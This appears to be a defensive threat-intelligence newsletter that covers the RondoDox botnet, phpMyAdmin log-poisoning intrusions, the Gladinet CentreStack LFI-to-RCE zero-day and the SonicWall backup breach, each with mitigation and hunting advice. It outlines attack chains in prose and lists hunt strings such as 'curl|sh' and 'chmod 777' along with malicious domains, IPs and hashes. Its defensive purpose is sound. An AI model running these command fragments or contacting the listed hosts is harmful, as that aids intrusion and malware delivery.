Special Edition - Edge security roundup: RondoDox, Gladinet 0-day, SonicWall

It’s one of those Fridays. Multiple active campaigns at the edge, a fresh 0‑day with real‑world abuse, and a breach that turns firewall backups into attacker candy. Keep it brief, keep it moving: block WAN admin, patch or workaround Gladinet, sweep for web shells, and rotate anything SonicWall ever touched.

Botnets With Bad Manners: RondoDox’s “Exploit Shotgun”

UncleSp1d3r: RondoDox is running the snuggest little crime-as-a-service you didn’t ask for — mass-scanning internet‑facing routers, DVRs/NVRs, CCTV boxes, and embedded web servers, then firing an “exploit shotgun” of 50+ n‑day bugs until something sticks. Post‑exploit it pivots through command injection to shell, drops multi‑architecture loaders, and pulls down DDoS/miner modules or RondoDox/Mirai/Morte flavors. Infra rotates constantly. Think CVE greatest hits like CVE-2023-1389 (TP‑Link), CVE-2024-3721, CVE-2024-12856, plus ~18 no‑CVE specials for good measure. Confirmed in telemetry and some CVEs now sit in CISA KEV. Sources: Trend Micro, SecurityWeek, BleepingComputer, The Register.

What to do now (today, ideally):

• Kill public admin: block WAN HTTP/HTTPS/Telnet/SSH to device management. Gate via VPN or jump hosts; allow‑list admin IPs.
• Patch firmware across router/DVR/CCTV fleets; prioritize KEV‑listed bugs and anything Trend calls out.
• Virtual patching: WAF/IPS for LFI/traversal/command injection patterns and known CGI endpoints.
• Hunt for loader traces and shell abuse: “#!/bin/sh”, “chmod 777”, “service apparmor stop”, “curl|sh”, “rondo.” strings; look for Proton/Tutanota email markers mentioned by Trend. Egress‑watch for odd HTTP/UDP floods.

phpMyAdmin Log‑Poisoning → Nezha → Ghost RAT

KryptoKat: Huntress caught live intrusions abusing exposed phpMyAdmin panels — using MariaDB’s general_log to “poison” a PHP file that becomes a web shell, then driving AntSword like it’s a weekend rental. From there, operators fetch a Nezha agent (legit monitoring tool repurposed as RMM) to stage a Ghost RAT variant, disable Defender exclusions via PowerShell, and settle in. Over 100 victims observed, clustered in East Asia but not exclusively. Details and IOCs: Huntress, coverage via Infosecurity Magazine.

High‑value IOCs to block/hunt:

• Domains: rism.pages.dev, c.mid.al, gd.bj2.xyz
• IPs: 54.46.50.255, 45.207.220.12, 172.245.52.169, 38.246.250.201
• Hash samples (spot‑check fleet): f3570bb6e0f9c695d48f89f043380b43831dd0f6fe79b16eda2a3ffd9fd7ad16, 9f33095a24471bed55ce11803e4ebbed5118bfb5d3861baf1c8214efcd9e7de6

Mitigation fast track:

• Remove phpMyAdmin from the internet. Full stop. Put it behind VPN/allow‑lists with strong auth.
• Hunt for web shell POSTs and AntSword virtual terminal signatures; alert on httpd/IIS child processes launching curl/powershell.exe.
• Detect Nezha/Ghost egress and persistence: services named “SQLlite”, files in C:\Windows\Cursors\, mutex “gd.bj2[.]xyz:53762:SQLlite”; look for Add‑MpPreference abuse.
• Disable general_log (or force safe log locations) in MariaDB; nuke test installs in prod.

Actively Exploited 0‑Day: Gladinet CentreStack & Triofox (CVE-2025-11371)

KryptoKat: An unauthenticated LFI in CentreStack/Triofox lets attackers read Web.config, lift the machine keys, and then abuse ViewState deserialization to achieve RCE on the web tier. Huntress says it’s in the wild, and NVD agrees. There’s no vendor patch yet; use the published workaround and lock these portals down immediately. Sources: Huntress, NVD.

Do this now:

• Pull internet exposure for CentreStack/Triofox admin endpoints. Require VPN or allow‑listed IPs.
• Implement Huntress’s workaround: disable the “temp” handler in UploadDownloadProxy/Web.config (C:\Program Files (x86)\Gladinet Cloud Enterprise\UploadDownloadProxy\Web.config). Expect some functionality loss.
• Rotate machine/application keys and any creds in Web.config — treat exposed material as compromised.
• Hunt for ViewState exploit artifacts, web shells, odd base64 blobs, and new services spawned by the app pool. Stand up WAF/IPS rules for LFI patterns.

Major Breach: SonicWall Cloud Backups Accessed

KryptoKat: SonicWall confirmed an intruder accessed firewall configuration backup files stored in the MySonicWall cloud backup service. The files are encrypted, but possession still raises the stakes — reused creds, recoverable keys, and a roadmap to your management plane. If you used cloud backups, assume those configs are compromised and act accordingly. Sources: SonicWall’s notice (customer advisory), plus coverage via CISA, Dark Reading, and BleepingComputer.

Immediate priorities:

• Rotate everything those backups carried: appliance admin passwords, VPN pre‑shared keys, RADIUS/LDAP binds, API tokens, certificates/keys.
• Lock down management: allow‑listed admin IPs, MFA everywhere, review and restrict MySonicWall API access.
• Audit for fallout: unusual management logins, config changes, and policy pushes after the breach window. Consider disabling cloud backups until you can validate controls.

Ongoing: Oracle E‑Business Suite (CVE-2025-61882) — New Extortion Claims, Low Confidence

UncleSp1d3r: Midweek we covered Oracle’s EBS zero‑day and the scramble to patch. Since then, an AlienVault OTX pulse is claiming CL0P‑linked activity chaining UiServlet/SyncServlet exploitation into a Java implant train (GOLDVEIN downloader → SAGE implant) and executive‑targeted extortion emails. This is uncorroborated by other authoritative sources in our sweep; treat it as a heads‑up, not gospel. If you run EBS, keep it patched and internal, and hunt for weird servlets/classloader persistence and suspicious outbound C2. Source: OTX pulse (feed).

What to add to your hunt:

• Unusual requests to UiServlet/SyncServlet; new JSPs/servlets in webapp dirs.
• Spawned Java processes from EBS web tier; odd classloader artifacts.
• Outbound web beacons; block any C2s you can validate.
• Watch exec inboxes for extortion lures; turn on advanced phishing protections and MFA.

Heads‑Up: ZDI‑CAN‑28255 (All Hands) — Coordinated Disclosure Brews

KryptoKat: ZDI posted an upcoming advisory for All Hands (CVSS 7.8) with a long lead time — vendor has until 2026‑02‑06 to ship a fix. No public details yet, no exploitation confirmed, but if you run it on the internet, now’s a fine time for allow‑lists, VPN‑only admin, and beefy logging around management actions. Keep an eye on the board: ZDI Upcoming Advisories.

Closing thoughts: If you only triage three things before the weekend: block WAN admin on edge devices, implement the Gladinet workaround + access controls, and rotate SonicWall‑related credentials. As Captain Sisko might say, there’s a difference between vigilance and paranoia — but this week, a little paranoia comes with patch notes. Stay sharp out there.

— Kat & Sp1d3r